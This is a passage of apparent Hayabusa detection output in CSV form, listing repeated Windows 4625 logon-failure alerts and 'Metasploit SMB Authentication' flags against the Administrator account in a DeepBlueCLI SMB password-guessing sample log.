Password,User: Administrator : Type: 3 : Workstation: UVkpQvotEMfM8R0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm6uHEy5RJJBJ6FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPTyAkYjcIlko5lu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OjlRoo9Sot4Fx4Th : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XslY26kw2aBw19D8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1404fakprYeqGiNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2VfIjtBcXCRlOjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPztyX4J9NV8EldT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 07flrrzWgsVBYaN2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vgkqkC1VvznGxR6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: hMn6yDMLgLChJTL6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uSTokOJ31Tj0bLXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyRifC46GrNpTA4x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvNaby30vAT9drAX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wkYSOQ2bD51a4U8l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rqdOquL9Ax01RPPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nqCCiK5arcyRHha6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpyTGZLkAb0w0kgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wa2pXrZKxeZZYKAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dK0N5KeBgCze1YWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: g4dHlwZjMzI5wU2s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GzF2ouP5KkRfsxnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSQxMrGlDiAOo6ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gL0rz3p1yG6RhfAT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyChoTSKgJeK6yqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG4I11dwpBM9SM3l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7foAZ5Y1igCbHap : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ATDXUljQwg8WvUVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdmXaJqQMAG2g6Ao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bjame5puT5CDeoIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 0FGGVVkckmdURVh6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j0Smqw4cA4wG2Q6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLWloOhUYEQlj6y6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Tuxuykh0j5afeTH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeXS6QwYhqJAOeuz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AqFSJCq5bmBW6dj1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DH1zyt1hxTgzajhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rrZxcWjUX4OgYYIb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ExtkYXSJI8F41uvw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sLh1Q3RieOoukiCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: kNb2hZDxi4QrbQpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCb1TMlFj2PjH2sA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rgF42C57Nx6F3HU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KZfFH9geIrxVYowJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWz1XeyxywR0o5gS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: og1kItEC6WhqXF37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0KhaJlD6tWwF2ky : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
